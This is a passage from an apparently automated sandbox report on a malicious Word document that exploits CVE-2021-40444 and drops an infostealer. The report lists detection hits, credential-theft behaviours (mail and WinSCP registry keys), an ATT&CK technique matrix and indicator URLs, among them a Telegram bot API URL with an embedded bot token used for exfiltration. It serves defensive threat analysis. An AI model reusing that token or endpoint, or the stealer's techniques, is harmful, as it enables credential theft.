                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR
                Source: Yara matchFile source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: Yara matchFile source: 00000011.00000002.622387434.0000000003114000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR
                Source: Yara matchFile source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Input Capture
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Native API
                1
                Registry Run Keys / Startup Folder
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Credentials in Registry
                114
                System Information Discovery
                Remote Desktop Protocol1
                Email Collection
                Exfiltration Over Bluetooth3
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts23
                Exploitation for Client Execution
                Logon Script (Windows)1
                Registry Run Keys / Startup Folder
                3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Input Capture
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts1
                Command and Scripting Interpreter
                Logon Script (Mac)Logon Script (Mac)13
                Software Packing
                NTDS311
                Security Software Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Masquerading
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 770660 Sample: Payment copy_2911022.docx.doc Startdate: 20/12/2022 Architecture: WINDOWS Score: 100 45 pzsrblog.com 2->45 47 api4.ipify.org 2->47 49 2 other IPs or domains 2->49 59 Detected CVE-2021-40444 exploit 2->59 61 Snort IDS alert for network traffic 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 14 other signatures 2->65 7 PROMZwFp385vXrN.exe 3 2->7         started        10 WINWORD.EXE 58 68 2->10         started        13 PMoZbw.exe 2->13         started        15 3 other processes 2->15 signatures3 process4 dnsIp5 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->73 75 May check the online IP address of the machine 7->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->77 79 Injects a PE file into a foreign processes 7->79 18 PROMZwFp385vXrN.exe 17 4 7->18         started        57 pzsrblog.com 118.27.125.229, 443, 49701, 49702 INTERQGMOInternetIncJP Japan 10->57 23 msdt.exe 21 10->23         started        25 MSOSYNC.EXE 5 12 10->25         started        81 Multi AV Scanner detection for dropped file 13->81 83 Machine Learning detection for dropped file 13->83 39 C:\Users\user\AppData\Local\...\zf01cjt2.dll, PE32 15->39 dropped 41 C:\Users\user\AppData\Local\...\yjsbg2wl.dll, PE32 15->41 dropped 43 C:\Users\user\AppData\Local\...\mnm1snwx.dll, PE32 15->43 dropped 27 cvtres.exe 1 15->27         started        29 cvtres.exe 1 15->29         started        31 cvtres.exe 1 15->31         started        file6 signatures7 process8 dnsIp9 51 api4.ipify.org 64.185.227.156, 443, 49724, 49727 WEBNXUS United States 18->51 53 192.168.2.1 unknown unknown 18->53 55 api.ipify.org 18->55 33 C:\Users\user\AppData\Roaming\...\PMoZbw.exe, PE32 18->33 dropped 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->67 69 Tries to steal Mail credentials (via file / registry access) 18->69 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->71 35 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 23->35 dropped 37 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 23->37 dropped file10 signatures11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Payment copy_2911022.docx.doc41%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
                Payment copy_2911022.docx.doc46%VirustotalBrowse
                Payment copy_2911022.docx.doc100%AviraEXP/CVE-2021-40444.Gen
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe38%ReversingLabsByteCode-MSIL.Trojan.Scarsi
                C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll0%ReversingLabs
                C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui0%ReversingLabs
                SourceDetectionScannerLabelLinkDownload
                17.0.PROMZwFp385vXrN.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                SourceDetectionScannerLabelLink
                pzsrblog.com2%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://cdn.entity.0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                http://www.fontbureau.comalsF0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                https://my.microsoftpersonalcontent.com0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ncus.contentsync.0%URL Reputationsafe
                https://wus2.contentsync.0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.carterandcone.com.0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.fontbureau.comrsiv0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.comlicY=0%Avira URL Cloudsafe
                http://wz5PFqmQeks9Nrk59.com0%Avira URL Cloudsafe
                http://www.fontbureau.comd$=0%Avira URL Cloudsafe
                http://www.tiro.K%0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/w=0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/staff/dennis.htm;0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/Y=0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/j=0%Avira URL Cloudsafe
                http://www.fontbureau.comedta0%Avira URL Cloudsafe
                http://www.monotype.s0%Avira URL Cloudsafe
                http://www.fontbureau.com6=0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/jp/e=0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/e=0%Avira URL Cloudsafe
                http://www.tiro.comf(0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/w=0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                pzsrblog.com
                118.27.125.229
                truetrueunknown
                api4.ipify.org
                64.185.227.156
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    api.ipify.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://shell.suite.office.com:1443059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                          high
                          http://www.galapagosdesign.com/w=PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://autodiscover-s.outlook.com/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                            high
                            http://www.jiyu-kobo.co.jp/j=PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                              high
                              https://cdn.entity.059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                high
                                https://rpsticket.partnerservices.getmicrosoftkey.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://lookup.onenote.com/lookup/geolocation/v1059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                  high
                                  http://www.fontbureau.com/designersPROMZwFp385vXrN.exe, 0000000F.00000003.514679156.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507511308.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                      high
                                      http://www.fontbureau.comalsFPROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                        high
                                        https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/1673982758%discordapi%yyyPROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.aadrm.com/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comlicY=PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://wz5PFqmQeks9Nrk59.comPROMZwFp385vXrN.exe, 00000011.00000002.628798614.0000000003332000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                            high
                                            https://api.microsoftstream.com/api/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                              high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                high
                                                http://www.fontbureau.com/designers/frere-jones.htmlNPROMZwFp385vXrN.exe, 0000000F.00000003.505106593.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cr.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                    high
                                                    http://www.fontbureau.comd$=PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://www.galapagosdesign.com/DPleasePROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.zhongyicts.com.cnPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://res.getmicrosoftkey.com/api/redemptionevents059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/Y=PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://tasks.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                        high
                                                        https://officeci.azurewebsites.net/api/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://my.microsoftpersonalcontent.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://store.office.cn/addinstemplate059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://messaging.engagement.office.com/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                          high
                                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwPROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                            high
                                                            https://www.odwebp.svc.ms059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                high
                                                                https://api.addins.store.officeppe.com/addinstemplate059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://graph.windows.net059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                  high
                                                                  http://www.carterandcone.comlPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://consent.config.office.com/consentcheckin/v1.0/consents059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                    high
                                                                    https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                            high
                                                                            http://api.telegram.orgPROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                high
                                                                                http://www.tiro.K%PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                    high
                                                                                    https://pushchannel.1drv.ms059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                      high
                                                                                      http://www.galapagosdesign.com/staff/dennis.htm;PROMZwFp385vXrN.exe, 0000000F.00000003.509829844.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509981461.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509871998.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510314930.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510347822.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509783839.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510270514.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://wus2.contentsync.059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.founder.com.cn/cn/bThePROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://clients.config.office.net/user/v1.0/ios059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                        high
                                                                                        https://o365auditrealtimeingestion.manage.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                          high
                                                                                          https://outlook.office365.com/api/v1.0/me/Activities059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                            high
                                                                                            http://www.fontbureau.comedtaPROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://clients.config.office.net/user/v1.0/android/policies059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                              high
                                                                                              https://entitlement.diagnostics.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                high
                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                  high
                                                                                                  http://www.fontbureau.com6=PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://outlook.office.com/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                    high
                                                                                                    http://www.carterandcone.com.PROMZwFp385vXrN.exe, 0000000F.00000003.497239392.0000000005C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.jiyu-kobo.co.jp/jp/e=PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://storage.live.com/clientlogs/uploadlocation059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                      high
                                                                                                      http://www.typography.netDPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
